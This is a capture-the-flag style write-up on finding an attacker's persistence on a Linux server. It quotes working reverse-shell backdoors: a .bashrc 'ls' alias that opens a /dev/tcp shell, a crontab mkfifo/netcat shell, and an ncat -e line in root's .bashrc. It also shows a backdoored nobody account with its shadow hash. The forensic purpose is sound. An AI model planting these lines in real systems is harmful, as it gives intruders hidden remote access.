The scenario : We are called to find all the persistence mechanisms left by an attacker on a Linux machine.

1. What is the server’s OS version?

We access the server using ssh with the credentials given : ssh giorgio@[IP]. Once connected, we obtain the OS version directly, which is : Ubuntu 20.04.4 LTS.

2. What’s the most interesting file you found in giorgio’s home directory?

Once in the home directory, we can display all the files using ls -a, from which we obtain the list of hidden files.

giorgio@giorgio:~$ ls -a
. .bad_bash .bash_logout .cache .selected_editor .sudo_as_admin_successful
.. .bash_history .bashrc .profile .ssh .viminfo

There is an interesting file called .bad_bash, which is not a usual file that we find.

3. Another file that can be found in every user’s home directory is the .bashrc file. Can you check if you can find something interesting in giorgio’s .bashrc?

We are asked to analyze the .bashrc file of the user.

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
alias ls='(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls --color=auto'

Upon analysis, a suspicious alias for ls can be found, which seems to be used to trigger a remote access to the server. ls=’(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls — color=auto’

4. Did you find anything interesting about scheduled tasks?

We are now asked to look for unusual behavior in the scheduled tasks owned by the user. Linux stores the scheduled task in a cron file. To access it, we can use the command “crontab -e” to open the current user’s crontab file.

# m h  dom mon dow   command
* * * * * /usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f

The file opened shows a suspicious command to be executed by the scheduled task. This setup creates a bidirectional communication channel where the shell’s output is sent to the netcat connection and input from netcat is fed to the shell, enabling remote command execution from the IP address 172.10.6.9. /usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f

5,6,7. There is an error message in your terminal. What does it say?

It is time to investigate the root account. After logging in to the root account, a strange error message appears in the terminal : Ncat: TIMEOUT. The error message seems to be related to the following command : ncat -e /bin/bash 172.10.6.9 6969, which is displayed just after the error message.

root@giorgio:/home/giorgio# Ncat: TIMEOUT.

[1]+  Exit 1                  ncat -e /bin/bash 172.10.6.9 6969

But we need to find out how the error message appears. After analysis of the .bashrc file of the root user, we find that the commands have been written in it, which will allow persistence for the attacker.

8. What is the last persistence mechanism?

The final step is to find the last persistence mechanism the attackers used. It is said that the mechanism is related to unusual usage of something or someone already present in Linux. The first thing to check is the users of the system using the /etc/passwd and the /etc/shadow files. Something that comes up directly is that the nobody account has a password tied to it. However, the nobody account is a special user account used by the system to run process and services with minimal privileges. But there, it seems to be used as an user account, which is clearly an unusual activity. Additionally, the nobody account seems to belong to the root group (GID set to 0) and the login shell is set to /bin/bash, which allows interactive login. The nobody account should have a non interactive shell such as /usr/sbin/nologin or /bin/false.

root@giorgio:/home/giorgio# cat /etc/shadow
nobody:$6$A9gfhQx8obsFyyd2$op0KH1DveXQjwlabwY3jlFy6hTofzbQ/zawUmQLiT5cLOd.vNpqk0r1K4Z5cNVI98KAvD/cdrh6CbaziBrw1A.:19095:0:99999:7:::

Thanks for reading!